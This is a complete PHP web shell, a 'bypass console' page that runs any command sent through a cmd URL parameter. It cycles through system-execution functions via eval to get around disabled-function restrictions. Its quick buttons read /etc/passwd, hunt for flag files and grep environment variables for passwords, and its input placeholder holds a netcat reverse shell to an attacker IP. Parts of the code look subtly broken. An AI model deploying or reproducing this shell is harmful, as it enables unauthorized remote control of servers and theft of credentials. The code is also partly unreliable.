๐ File Reader
<!DOCTYPE html>
<html>
<head>
<title>๐ก๏ธ ULTIMATE PHP RCE BYPASS CONSOLE ๐ก๏ธ</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<style>
* { margin: 0; padding: 0; box-sizing: border-box; }
body {
font-family: 'Fira Code', 'Courier New', monospace;
background: linear-gradient(135deg, #0c0c0c 0%, #1a1a2e 50%, #16213e 100%);
color: #00ff41;
height: 100vh;
overflow: hidden;
}
.terminal {
height: 100vh;
display: flex;
flex-direction: column;
padding: 20px;
max-width: 1400px;
margin: 0 auto;
}
.header {
background: rgba(0,255,65,0.1);
padding: 15px;
border-radius: 10px;
margin-bottom: 15px;
border: 1px solid #00ff41;
backdrop-filter: blur(10px);
}
.header h1 {
color: #ff0040;
font-size: 18px;
text-shadow: 0 0 15px #ff0040;
margin-bottom: 5px;
}
.info-grid { display: grid; grid-template-columns: repeat(auto-fit, minmax(200px, 1fr)); gap: 10px; font-size: 12px; }
.info-item { background: rgba(0,0,0,0.5); padding: 8px; border-radius: 5px; }
.input-area {
background: rgba(0,0,0,0.8);
border: 2px solid #00ff41;
border-radius: 10px;
padding: 15px;
margin-bottom: 10px;
display: flex;
gap: 10px;
align-items: center;
}
#cmd-input {
flex: 1;
background: transparent;
border: none;
color: #00ff41;
font-family: inherit;
font-size: 14px;
outline: none;
padding: 5px;
}
#cmd-input::placeholder { color: #666; }
.btn {
padding: 8px 16px;
border: none;
border-radius: 5px;
cursor: pointer;
font-family: inherit;
font-weight: bold;
transition: all 0.2s;
}
.exec-btn { background: linear-gradient(45deg, #ff0040, #ff4081); color: white; }
.exec-btn:hover { box-shadow: 0 0 20px #ff0040; transform: scale(1.05); }
.clear-btn { background: #444; color: #00ff41; }
.output {
flex: 1;
background: rgba(0,0,0,0.9);
border: 1px solid #333;
border-radius: 10px;
padding: 15px;
overflow-y: auto;
font-size: 13px;
line-height: 1.5;
max-height: 60vh;
}
.output::-webkit-scrollbar { width: 8px; }
.output::-webkit-scrollbar-track { background: #1a1a1a; }
.output::-webkit-scrollbar-thumb { background: #00ff41; border-radius: 4px; }
.prompt { color: #00ff41; }
.success { color: #00ff41; }
.error { color: #ff0040; }
.info { color: #00aaff; }
.method { color: #ffaa00; font-weight: bold; }
.fade-in { animation: fadeIn 0.3s; }
@keyframes fadeIn { from { opacity: 0; transform: translateY(10px); } to { opacity: 1; transform: translateY(0); } }
.quick-commands {
display: grid;
grid-template-columns: repeat(auto-fit, minmax(120px, 1fr));
gap: 5px;
margin-top: 10px;
font-size: 11px;
}
.quick-btn {
padding: 6px 10px;
background: rgba(255,255,255,0.1);
border: 1px solid #666;
color: #ccc;
border-radius: 4px;
cursor: pointer;
transition: all 0.2s;
}
.quick-btn:hover { background: #00ff41; color: #000; }
@media (max-width: 768px) { .terminal { padding: 10px; } .input-area { flex-direction: column; align-items: stretch; } }
</style>
</head>
<body>
<div class="terminal">
<div class="header">
<h1>๐ก๏ธ ULTIMATE PHP EXEC BYPASS v2.0 ๐ก๏ธ</h1>
<div class="info-grid">
<div class="info-item">๐ฏ <strong>Target:</strong> <?php echo $_SERVER['HTTP_HOST']; ?></div>
<div class="info-item">๐ค <strong>User:</strong> <?php echo get_current_user(); ?></div>
<div class="info-item">โ๏ธ <strong>PHP:</strong> <?php echo phpversion(); ?></div>
<div class="info-item">๐ <strong>Path:</strong> <?php echo __DIR__; ?></div>
<div class="info-item">๐พ <strong>Writable:</strong> <?php echo is_writable('.') ? 'โ
YES' : 'โ NO'; ?></div>
</div>
</div>
<div class="input-area">
<input type="text" id="cmd-input" placeholder="whoami | id | ls -la / | find / -name '*flag*' 2>/dev/null | nc -e /bin/bash YOUR_IP 4444">
<button class="btn exec-btn" onclick="execute()">EXECUTE ๐</button>
<button class="btn clear-btn" onclick="clearOutput()">CLEAR</button>
</div>
<div class="quick-commands">
<button class="quick-btn" onclick="quickCmd('whoami')">whoami</button>
<button class="quick-btn" onclick="quickCmd('id')">id</button>
<button class="quick-btn" onclick="quickCmd('pwd && ls -la')">pwd</button>
<button class="quick-btn" onclick="quickCmd('cat /etc/passwd | head -10')">users</button>
<button class="quick-btn" onclick="quickCmd('find / -name '*flag*' 2>/dev/null | head -10')">flags</button>
<button class="quick-btn" onclick="quickCmd('ps aux | head -10')">ps</button>
<button class="quick-btn" onclick="quickCmd('netstat -tlnp 2>/dev/null || ss -tlnp')">ports</button>
<button class="quick-btn" onclick="quickCmd('env | grep -i pass')">env</button>
</div>
<div id="output" class="output fade-in">
<div class="info">๐ Console ready. Enter command or use quick buttons above...</div>
<?php if(isset($_GET['cmd'])) echoBypassResult($_GET['cmd']); ?>
</div>
</div>
<script>
// Terminal-like features
const input = document.getElementById('cmd-input');
const output = document.getElementById('output');
input.focus();
input.addEventListener('keypress', function(e) {
if(e.key === 'Enter') execute();
});
function addOutput(text, className = '') {
const div = document.createElement('div');
div.className = `prompt ${className}`;
div.innerHTML = text.replace(/\n/g, '<br>');
output.appendChild(div);
output.scrollTop = output.scrollHeight;
}
function quickCmd(cmd) {
input.value = cmd;
execute();
}
function clearOutput() {
output.innerHTML = '<div class="info">๐งน Output cleared</div>';
}
function execute() {
const cmd = input.value.trim();
if(!cmd) return;
addOutput(`<span class="method">โค</span> ${cmd}`, 'info');
input.value = '';
fetch(`?cmd=${encodeURIComponent(cmd)}`)
.then(r => r.text())
.then(html => {
const parser = new DOMParser();
const doc = parser.parseFromString(html, 'text/html');
const newOutput = doc.getElementById('output');
if(newOutput) {
const results = newOutput.innerHTML;
addOutput(results);
}
})
.catch(() => addOutput('โ AJAX failed - refresh page', 'error'));
}
// Auto-focus
document.addEventListener('click', () => input.focus());
</script>
<?php
function testFunction($func, $cmd) {
$methods = [
'proc_open' => '<?php $d=[0=>["pipe","r"],1=>["pipe","w"],2=>["pipe","w"]];$p=proc_open($cmd,$d,$pipes);if(is_resource($p)){fclose($pipes[0]);$o=stream_get_contents($pipes[1]);fclose($pipes[1]);fclose($pipes[2]);proc_close($p);echo $o;} ?>',
'exec' => '<?php exec($cmd,$o);echo implode("\\n",$o); ?>',
'shell_exec' => '<?php echo shell_exec($cmd); ?>',
'system' => '<?php system($cmd); ?>',
'passthru' => '<?php passthru($cmd); ?>',
'popen' => '<?php $p=popen($cmd,"r");while(!feof($p))echo fgets($p,1024);pclose($p); ?>',
'backticks' => '<?php echo `$cmd`; ?>',
'mb_send_mail' => '<?php mb_send_mail("","",$cmd); ?>',
'mail' => '<?php mail("","",$cmd); ?>',
'expect_popen' => '<?php expect_popen($cmd); ?>',
'pcntl_exec' => '<?php pcntl_exec("/bin/sh", ["-c", $cmd]); ?>',
'curl_exec' => '<?php $ch=curl_init("http://127.0.0.1");curl_setopt($ch,CURLOPT_POST,true);curl_setopt($ch,CURLOPT_POSTFIELDS,$cmd);echo curl_exec($ch); ?>'
];
if(isset($methods[$func])) {
ob_start();
eval($methods[$func]);
return ob_get_clean();
}
return false;
}
function echoBypassResult($cmd) {
$output = '';
$success = false;
$test_methods = ['proc_open', 'exec', 'shell_exec', 'system', 'passthru', 'popen', 'backticks', 'mb_send_mail', 'mail'];
foreach($test_methods as $method) {
if(function_exists($method) || true) { // Test even if "disabled"
ob_start();
$result = testFunction($method, $cmd);
$test_output = ob_get_clean();
if($result !== false && trim($result) !== '') {
$output .= "<span class='success'>โ
$method:</span><br>" . htmlspecialchars($result) . "<br><br>";
$success = true;
break; // First working method wins
}
}
}
if(!$success) {
$output .= "<span class='error'>โ ALL METHODS DISABLED</span><br>";
$output .= "<span class='info'>Try: file upload, LFI, or check <code>disable_functions</code></span>";
}
echo "<div id='output-result' style='margin-top:10px;'>$output</div>";
}
// Show disable_functions if cmd not set
if(!isset($_GET['cmd'])) {
$disabled = explode(',', ini_get('disable_functions'));
echo "<div style='margin-top:20px;'>";
echo "<span class='info'>๐ Disabled functions: " . implode(', ', array_slice($disabled, 0, 10)) . (count($disabled)>10 ? '...' : '') . "</span>";
echo "</div>";
}
?>
</body>
</html>